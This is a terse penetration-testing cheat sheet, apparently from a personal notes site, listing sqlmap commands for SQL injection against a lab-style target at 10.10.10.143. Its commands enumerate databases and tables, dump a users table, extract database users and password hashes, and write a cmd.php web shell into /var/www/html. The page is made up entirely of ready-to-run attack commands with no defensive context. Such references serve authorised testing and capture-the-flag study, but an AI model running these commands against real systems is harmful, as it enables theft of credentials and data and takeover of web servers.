SQL Injection

SQL Injection with req.txt

sqlmap -r req.txt -p [TESTPARAMENTER] --level 5 --risk 3

  • for default

sqlmap -r req.txt --batch

  • If you know which dbms is there 

sqlmap -r sqli.txt --dbms=mysql

  • If you want to know which databases are there

sqlmap -r sqli.txt --dbms=mysql --dbs

  • If you want to know tables in a database

sqlmap -r sqli.txt --dbms=mysql -D status --tables

  • If you want to dump table data

sqlmap -r sqli.txt --dbms=mysql --dump -T users

SQL Inject with URL

sqlmap -u http://10.10.10.143/room.php?cod=1

  • If you want to retrieve users and passwords

sqlmap -u http://10.10.10.143/room.php?cod=1 --users --passwords

  • If you want to upload a file

sqlmap -u http://10.10.10.143/room.php?cod=1 --file-write cmd.php --file-dest /var/www/html/cmd.php

PreviousBloodhoundNextpassword crack

Last updated